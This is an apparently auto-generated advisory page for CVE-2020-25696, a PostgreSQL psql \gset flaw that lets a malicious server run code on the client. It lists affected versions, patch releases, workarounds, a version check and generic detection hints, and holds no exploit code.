CVE-2020-25696 – This vulnerability allows remote code execution... (How to Fix)

📋 TL;DR

This vulnerability allows remote code execution through PostgreSQL's psql interactive terminal when using the \gset command against a compromised server. Attackers can execute arbitrary code as the operating system account running psql, affecting data confidentiality, integrity, and system availability. Users of affected PostgreSQL versions with interactive psql sessions are vulnerable.

💻 Affected Systems

Products:

PostgreSQL

Versions: Versions before 13.1, before 12.5, before 11.10, before 10.15, before 9.6.20, and before 9.5.24

Operating Systems: All operating systems running affected PostgreSQL versions

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects interactive psql sessions using the \gset command when connecting to a compromised/malicious server.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with attacker gaining the same privileges as the psql user, potentially leading to data theft, system destruction, or lateral movement.

🟠

Likely Case

Limited code execution in the context of the psql user, potentially allowing database access, file system manipulation, or credential harvesting.

🟢

If Mitigated

No impact if psql is not used interactively or if connections are restricted to trusted servers only.

🌐 Internet-Facing: MEDIUM - Requires interactive psql session and connection to compromised server, which is less common for internet-facing systems.

🏢 Internal Only: HIGH - Internal users frequently use interactive psql sessions for database administration and development work.

🎯 Exploit Status

Public PoC: ✅ No

Weaponized: UNKNOWN

Unauthenticated Exploit: ✅ No

Complexity: MEDIUM

Requires attacker to control the PostgreSQL server that the victim connects to with psql, or to trick the victim into connecting to a malicious server.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: PostgreSQL 13.1, 12.5, 11.10, 10.15, 9.6.20, and 9.5.24

Vendor Advisory: https://www.postgresql.org/about/news/postgresql-131-125-1110-1015-9620-and-9524-released-2111/

Restart Required: Yes

Instructions:

1. Identify PostgreSQL version. 2. Download appropriate patched version from PostgreSQL website. 3. Stop PostgreSQL service. 4. Install update following vendor instructions. 5. Restart PostgreSQL service. 6. Verify version is updated.

🔧 Temporary Workarounds

Avoid interactive psql with untrusted servers

all

Do not use interactive psql sessions, particularly the \gset command, when connecting to untrusted or potentially compromised PostgreSQL servers.

Restrict psql usage

all

Limit interactive psql usage to trusted administrators only and enforce connection policies to known-good servers.

🧯 If You Can't Patch

Disable or restrict interactive psql usage for all users
Implement strict network controls to prevent connections to untrusted PostgreSQL servers

🔍 How to Verify

Check if Vulnerable:

Check PostgreSQL version with 'psql --version' and compare against affected versions list.

Check Version:

psql --version

Verify Fix Applied:

After patching, run 'psql --version' to confirm version is 13.1, 12.5, 11.10, 10.15, 9.6.20, 9.5.24 or higher.

📡 Detection & Monitoring

Log Indicators:

Unusual psql connection patterns
Multiple failed \gset command attempts
Connections from unexpected sources to psql sessions

Network Indicators:

Unexpected outbound connections from workstations to unknown PostgreSQL servers
Psql traffic to non-standard or suspicious IP addresses

SIEM Query:

source="postgresql.log" AND (\gset OR psql) AND (error OR failed OR suspicious)

📊 Metadata

CVE ID: CVE-2020-25696

CVSS v3 Score: 7.5 (HIGH)

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-183

Published: November 23, 2020

Last Updated: November 21, 2024

🔗 References

https://bugzilla.redhat.com/show_bug.cgi?id=1894430 Issue Tracking,Patch,Third Party Advisory
https://lists.debian.org/debian-lts-announce/2020/12/msg00005.html Mailing List,Third Party Advisory
https://security.gentoo.org/glsa/202012-07 Third Party Advisory
https://www.postgresql.org/about/news/postgresql-131-125-1110-1015-9620-and-9524-released-2111/ Release Notes,Vendor Advisory
https://bugzilla.redhat.com/show_bug.cgi?id=1894430 Issue Tracking,Patch,Third Party Advisory
https://lists.debian.org/debian-lts-announce/2020/12/msg00005.html Mailing List,Third Party Advisory
https://security.gentoo.org/glsa/202012-07 Third Party Advisory
https://www.postgresql.org/about/news/postgresql-131-125-1110-1015-9620-and-9524-released-2111/ Release Notes,Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2020-25696, you might also want to check these:

📋 TL;DR

💻 Affected Systems

📦 What is this software?

Debian Linux by Debian

Postgresql by Postgresql

Postgresql by Postgresql

Postgresql by Postgresql

Postgresql by Postgresql

Postgresql by Postgresql

Postgresql by Postgresql

⚠️ Risk & Real-World Impact

Worst Case

Likely Case

If Mitigated

🎯 Exploit Status

🛠️ Fix & Mitigation

✅ Official Fix

Instructions:

🔧 Temporary Workarounds

Avoid interactive psql with untrusted servers

Restrict psql usage

🧯 If You Can't Patch

🔍 How to Verify

Check if Vulnerable:

Check Version:

Verify Fix Applied:

📡 Detection & Monitoring

Log Indicators:

Network Indicators:

SIEM Query:

📊 Metadata

🔗 References

📤 Share & Export

🔗 Related Vulnerabilities